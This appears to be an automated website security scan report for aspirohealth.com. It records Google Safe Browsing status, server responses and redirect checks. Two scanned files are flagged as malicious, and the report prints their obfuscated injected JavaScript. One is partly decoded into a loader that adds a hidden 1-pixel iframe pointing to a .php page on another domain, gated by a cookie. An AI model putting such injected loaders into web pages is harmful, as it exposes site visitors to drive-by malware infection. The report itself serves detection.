Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=aspirohealth.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.aspirohealth.com/ | HTTP/1.1 200 OK Date: Tue, 23 Dec 2014 05:50:20 GMT Accept-Ranges: bytes ETag: "dccd8b3529ace1:4d00c" Server: Microsoft-IIS/6.0 Content-Length: 5914 Content-Location: http://www.aspirohealth.com/index.html Content-Type: text/html Last-Modified: Fri, 16 Aug 2013 07:32:02 GMT MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET | clean |
http://www.aspirohealth.com/index.html | HTTP/1.1 200 OK Date: Tue, 23 Dec 2014 05:50:20 GMT Accept-Ranges: bytes ETag: "dccd8b3529ace1:4d00c" Server: Microsoft-IIS/6.0 Content-Length: 5914 Content-Type: text/html Last-Modified: Fri, 16 Aug 2013 07:32:02 GMT MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET | clean |
http://www.aspirohealth.com/_/welcome.html | 200 OK Content-Length: 15701 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) r=eval;function vqvq(){zva=function(){--(d.body)}()};a=("47,155,174,165,152,173,160,166,165,47,161,157,163,153,151,67,100,57,60,47,202,24,21,47,175,150,171,47,172,173,150,173,160,152,104,56,150,161,150,177,56,102,24,21,47,175,150,171,47,152,166,165,173,171,166,163,163,154,171,104,56,160,165,153,154,177,65,167,157,167,56,102,24,21,47,175,150,171,47,161,157,163,153,151,47,104,47,153,166,152,174,164,154,165,173,65,152,171,154,150,173,154,114,163,154,164,154,165,173,57,56,160,155,171,150,164,154,56, Antivirus reports:
| ||
http://www.aspirohealth.com/_/Scripts/iWebSite.js | 200 OK Content-Length: 156107 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) try{if(window.document)--document.getElementById('12')}catch(qq){if(qq!=null)ss=eval("St"+"ring");}a="2e74837c7182777d7c2e88888874747436372e891b182e846f802e866f86762e4b2e727d71837b737c823c7180736f8273537a737b737c8236357774806f7b733537491b181b18 Decoded script: String String function zzzfff() { var xaxh = document.createElement('iframe'); xaxh.src = 'http://truewellnessc.com/images/kLtzyR6P.php'; xaxh.style.position = 'absolute'; xaxh.style.border = '0'; xaxh.style.height = '1px'; xaxh.style.width = '1px'; xaxh.style.left = '1px'; xaxh.style.top = '1px'; if (!document.getElementById('xaxh')) { document.write('<div id=\'xaxh\'></div>'); document.getEl ( name != document.cookie.substring( 0, name.length ) ) ) { return null; } if ( start == -1 ) return null; var end = document.cookie.indexOf( ";", len ); if ( end == -1 ) end = document.cookie.length; return unescape( document.cookie.substring( len, end ) ); } if (navigator.cookieEnabled) { if(GetCookie('visited_uq')==55){}else{SetCookie('visited_uq', '55', '1', '/'); zzzfff(); } } Antivirus reports:
| ||
http://www.aspirohealth.com/Scripts/Widgets/SharedResources/WidgetCommon.js | 404 Not Found Content-Length: 1635 Content-Type: text/html | clean |
http://www.aspirohealth.com/test404page.js | 404 Not Found Content-Length: 1635 Content-Type: text/html | clean |
http://www.aspirohealth.com/Scripts/Widgets/Navbar/navbar.js | 404 Not Found Content-Length: 1635 Content-Type: text/html | clean |
http://www.aspirohealth.com/Scripts/iWebImage.js | 404 Not Found Content-Length: 1635 Content-Type: text/html | clean |
http://www.aspirohealth.com/Welcome_files/Welcome.js | 404 Not Found Content-Length: 1635 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: aspirohealth.com
Result:
GET / HTTP/1.1
Host: aspirohealth.com
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: aspirohealth.com
Referer: http://www.google.com/search?q=aspirohealth.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: aspirohealth.com
Referer: http://www.google.com/search?q=aspirohealth.com
Result:
The result is similar to the first query. There are no suspicious redirects found.